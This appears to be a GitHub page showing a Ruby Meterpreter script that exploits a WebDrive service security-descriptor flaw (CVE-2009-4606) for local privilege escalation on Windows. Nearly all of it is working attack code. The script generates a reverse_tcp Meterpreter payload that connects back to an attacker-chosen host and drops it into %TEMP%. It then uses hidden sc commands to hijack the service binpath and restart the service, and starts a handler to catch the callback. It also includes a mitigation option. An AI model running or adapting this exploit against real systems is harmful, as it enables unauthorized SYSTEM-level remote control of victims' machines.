-
Notifications
You must be signed in to change notification settings - Fork 0
/
srt_webdrive_priv.rb
128 lines (110 loc) · 4.21 KB
/
srt_webdrive_priv.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
# Due to an empty security descriptor, a local attacker can gain elevated privileges.
# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
# Vulnerability mitigation featured.
#
# Credit:
# - Discovery - Nine:Situations:Group::bellick
# - Meterpreter script - Trancer
#
# References:
# - http://retrogod.altervista.org/9sg_south_river_priv.html
# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
# - http://osvdb.org/show/osvdb/59080
#
# mtrancer[@]gmail.com
# http://www.rec-sec.com
##
#
# Options
#
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu"],
"-m" => [ false, "Mitigate"],
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
"-p" => [ true, "The port on the remote host where Metasploit is listening"]
)
#
# Default parameters
#
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
unsupported if client.platform !~ /win32|win64/i
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
print_line(opts.usage)
raise Rex::Script::Completed
when "-m"
client.sys.process.get_processes().each do |m|
if ( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Set correct service security descriptor to mitigate the vulnerability
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
nil, {'Hidden' => 'true'})
end
end
raise Rex::Script::Completed
when "-r"
rhost = val
when "-p"
rport = val.to_i
end
end
client.sys.process.get_processes().each do |m|
if ( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
# Stop the vulnerable service
print_status("Stopping service \"#{sname}\"...")
client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
# Set exe payload as service binpath
print_status("Setting \"#{sname}\" to #{tempexe}...")
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
sleep(1)
# Restart the service
print_status("Restarting the \"#{sname}\" service...")
client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['WORKSPACE'] = client.workspace
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
# Set service binpath back to normal
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
end
end